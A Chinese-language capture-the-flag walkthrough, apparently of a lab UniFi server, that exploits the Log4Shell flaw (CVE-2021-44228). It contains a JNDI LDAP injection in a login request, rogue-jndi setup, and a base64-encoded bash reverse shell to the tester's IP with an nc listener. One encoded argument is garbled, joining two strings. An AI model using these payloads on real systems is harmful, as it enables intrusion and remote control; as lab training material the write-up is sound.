# Task 1
Q:What ports are open?
┌──(root💀kali)-[~] | |
└─# nmap -sV -Pn 10.129.248.11 | |
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-09 16:50 CST | |
Nmap scan report for 10.129.248.11 | |
Host is up (0.50s latency). | |
Not shown: 996 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | |
6789/tcp open ibm-db2-admin? | |
8080/tcp open http-proxy | |
8443/tcp open ssl/nagios-nsca Nagios NSCA/cgi-bin/submit.cgi?new-service : | |
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 157.90 seconds |
nmap 扫一下立刻出结果!
A:22,6789,8080,8443
# Task 2
Q:Name of the software that is running on the highest port?
namp 通过端口没有识别出来,那么我们访问看看
Bad Request | |
This combination of host and port requires TLS. |
提示我们需要使用 TSL 协议,那么我们用 https
访问
这个恐怕只能肉眼识别然后人工搜索是什么软件了 ==、
A:UniFI network
# Task 3
Q:What is the version of the software that is running?
页面上的 logo 下面写了版本号 ==、
A:6.4.54
# Task 4
Q:What is the CVE for the identified vulnerability?
搜索这个软件 + 版本号,得到一个漏洞是 CVE-2021-44228
A:cve-2021-44228
# Task 5
Q:What is the version of Maven that we installed?
A: 3.6.3
# Task 6
Q:What protocol does JNDI leverage in the injection?
A: ldap
# Task 7
Q:What tool do we use to intercept the traffic, indicating the attack was successful?
A: tcpdump
# Task 8
Q:What port do we need to inspect intercepted traffic for?
A: 389
# Task 9
Q:What port is the MongoDB service running on?
A: 27117
# Task 10
Q:What is the default database name for UniFi applications?
A: ace
# Task 11
Q:What is the function we use to enumerate users within the database in MongoDB?
A: db.admin.find()
# Task 12
Q:What is the function to add data to the database in MongoDB?
A: db.admin.insert()
# Task 13
Q:What is the function we use to update users within the database in MongoDB?
A: db.admin.update()
# Task 14
Q:What is the password for the root user?
A:
# Flag
上来首先 nmap 扫一下端口
发现那个服务,这个在前面的题里面写了
得到 CMS 之后就去查对应的漏洞
得到漏洞是 cve-2021-44228
我们直接查这个漏洞的文章,对他利用
首先先打开流量监听 sudo tcpdump -i tun0
进去登录的时候直接抓包
在 remember
里面填充 log4j2 的 payload
POST /api/login HTTP/1.1 | |
Host: 10.129.96.149:8443 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 | |
Accept: */* | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Referer: https://10.129.96.149:8443/manage/account/login?redirect=%2Fmanage | |
Content-Type: application/json; charset=utf-8 | |
Origin: https://10.129.96.149:8443 | |
Content-Length: 71 | |
Te: trailers | |
Connection: close | |
{"username":"admin","password":"123456","remember":${jndi:ldap://10.10.16.61/o=tomcat},"strict":true} |
payload 里面的 IP 改成自己的网卡 IP
这样如果存在这个漏洞的话就会返回链接
我们放掉这个包,就能看到 tcpdump 里面出现了数据
说明进行了回连
那就确定了这个有 log4j 的漏洞
那么我们需要构建一个 class 包了
我们首先下载 maven
┌──(root💀kali)-[~/桌面/rogue-jndi-master] | |
└─# apt install maven |
安装好了之后下载一个写好的 exp
https://github.com/veracode-research/rogue-jndi
进去文件夹之后直接 ```mvn package
打包这个
打包结束后会提示你`BUILD SUCCESS`
接着我们获取反弹payload的bash64 加密
```cpp
┌──(root💀kali)-[~/桌面/rogue-jndi-master]
└─# echo 'bash -c bash -i >&/dev/tcp/10.10.16.61/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==
接着我们把服务启动一下
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuOTYvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.16.61" |
监听 4444 端口
nc -lnvp 4444 |